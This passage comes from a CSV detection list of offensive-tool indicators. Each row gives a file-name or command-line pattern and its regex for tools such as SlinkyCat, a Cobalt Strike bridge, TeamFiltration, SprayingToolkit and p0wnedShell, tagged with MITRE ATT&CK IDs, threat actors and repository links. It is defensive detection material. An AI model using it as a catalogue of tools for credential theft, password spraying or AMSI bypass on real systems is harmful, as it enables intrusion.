Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54251" "*output/DomainAdmins.txt*",".{0,1000}output\/DomainAdmins\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54252" "*output/DomainGroupsLocalAdmin.txt*",".{0,1000}output\/DomainGroupsLocalAdmin\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54253" "*output/DomainUserAccountsWithCompletedADDescription.txt*",".{0,1000}output\/DomainUserAccountsWithCompletedADDescription\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54254" "*output/ExchangeServers.txt*",".{0,1000}output\/ExchangeServers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54255" "*output/html/data/beacons.json*",".{0,1000}output\/html\/data\/beacons\.json.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","54256" "*output/NeverLoggedInAccounts.txt*",".{0,1000}output\/NeverLoggedInAccounts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD 
Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54257" "*output/NonDCWindows10Computers.txt*",".{0,1000}output\/NonDCWindows10Computers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54258" "*output/NonDCWindows11Computers.txt*",".{0,1000}output\/NonDCWindows11Computers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54259" "*output/NonDCWindows7Computers.txt*",".{0,1000}output\/NonDCWindows7Computers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54260" "*output/PasswordNeverExpire.txt*",".{0,1000}output\/PasswordNeverExpire\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54261" "*output/payloads/*",".{0,1000}output\/payloads\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","54262" "*output/RatChatPT_unix*",".{0,1000}output\/RatChatPT_unix.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False 
positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","54263" "*output/RDPMachines.txt*",".{0,1000}output\/RDPMachines\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54264" "*output/UsersInDomainAdminsGroup.txt*",".{0,1000}output\/UsersInDomainAdminsGroup\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54265" "*output/UsersLastPasswordChange.txt*",".{0,1000}output\/UsersLastPasswordChange\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54266" "*output/UsersNoPasswordRequired.txt*",".{0,1000}output\/UsersNoPasswordRequired\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54267" "*output/UsersPasswordMustChange.txt*",".{0,1000}output\/UsersPasswordMustChange\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54268" "*output/UsersPasswordNotChanged.txt*",".{0,1000}output\/UsersPasswordNotChanged\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54269" "*output/WinRMMachines.txt*",".{0,1000}output\/WinRMMachines\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54270" "*output: link.bin*",".{0,1000}output\:\slink\.bin.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","false positives expected !","4","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","54271" "*output: link.dll*",".{0,1000}output\:\slink\.dll.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","false positives expected !","4","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","54272" "*OutputTokens.txt --onedrive --owa*",".{0,1000}OutputTokens\.txt\s\-\-onedrive\s\-\-owa.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD 
accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","54273" "*Out-RundllCommand*",".{0,1000}Out\-RundllCommand.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","54274" "*OverrideLHOST 360.com*",".{0,1000}OverrideLHOST\s360\.com.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - 
CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","54275" "*owa */autodiscover/autodiscover.xml* --recon*",".{0,1000}owa\s.{0,1000}\/autodiscover\/autodiscover\.xml.{0,1000}\s\-\-recon.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","54277" "*OWA Enumeration via ActiveSync timing module --*",".{0,1000}OWA\sEnumeration\svia\sActiveSync\stiming\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","54278" "*OWA Spraying via ActiveSync module --*",".{0,1000}OWA\sSpraying\svia\sActiveSync\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","54279" "*OWASP/Amass*",".{0,1000}OWASP\/Amass.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER 
BEAR","Reconnaissance","https://github.com/caffix/amass","1","1","#linux","N/A","5","","N/A","","","","54280" "*OwnerPersist-POST.*",".{0,1000}OwnerPersist\-POST\..{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","54281" "*Ox-Bruter.pl*",".{0,1000}Ox\-Bruter\.pl.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","54282" "*OxidResolver.exe*",".{0,1000}OxidResolver\.exe.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","1","N/A","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","54283" "*-p 5000:5000 pador_vuln_server*",".{0,1000}\-p\s5000\:5000\spador_vuln_server.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","0","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","54284" "*P@ss4Hagrid29*",".{0,1000}P\@ss4Hagrid29.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD 
connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","54285" "*p0dalirius/Coercer*",".{0,1000}p0dalirius\/Coercer.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002 - T1649","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","N/A","8","710","70","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z","54286" "*p0dalirius/Coercer*",".{0,1000}p0dalirius\/Coercer.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","54287" "*p0dalirius/ExtractBitlockerKeys*",".{0,1000}p0dalirius\/ExtractBitlockerKeys.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","N/A","10","4","368","54","2025-01-31T09:39:55Z","2023-09-19T07:28:11Z","54288" "*p0dalirius/LDAPWordlistHarvester*",".{0,1000}p0dalirius\/LDAPWordlistHarvester.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of 
domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","Black Basta","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","N/A","5","","N/A","","","","54289" "*p0dalirius/pyLAPS*",".{0,1000}p0dalirius\/pyLAPS.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","#linux","N/A","9","2","105","16","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z","54290" "*p0f -i eth* -p*",".{0,1000}p0f\s\-i\seth.{0,1000}\s\-p.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54291" "*p0f/p0f.fp*",".{0,1000}p0f\/p0f\.fp.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54292" "*P0rtcu11i5!*",".{0,1000}P0rtcu11i5!.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","54293" "*p0wnedADAttacks.cs*",".{0,1000}p0wnedADAttacks\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application 
written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54294" "*p0wnedAmsiBypass.cs*",".{0,1000}p0wnedAmsiBypass\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54295" "*p0wnedAwareness.cs*",".{0,1000}p0wnedAwareness\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54296" "*p0wnedBinaries.cs*",".{0,1000}p0wnedBinaries\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). 
and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54297" "*p0wnedCredentialUI.cs*",".{0,1000}p0wnedCredentialUI\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54298" "*p0wnedEasySystem.cs*",".{0,1000}p0wnedEasySystem\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” 
Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54299" "*p0wnedExecute.cs*",".{0,1000}p0wnedExecute\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54300" "*p0wnedExploits.cs*",".{0,1000}p0wnedExploits\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. 
What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54301" "*p0wnedExtensionMethods.cs*",".{0,1000}p0wnedExtensionMethods\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54302" "*p0wnedHost.cs*",".{0,1000}p0wnedHost\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). 
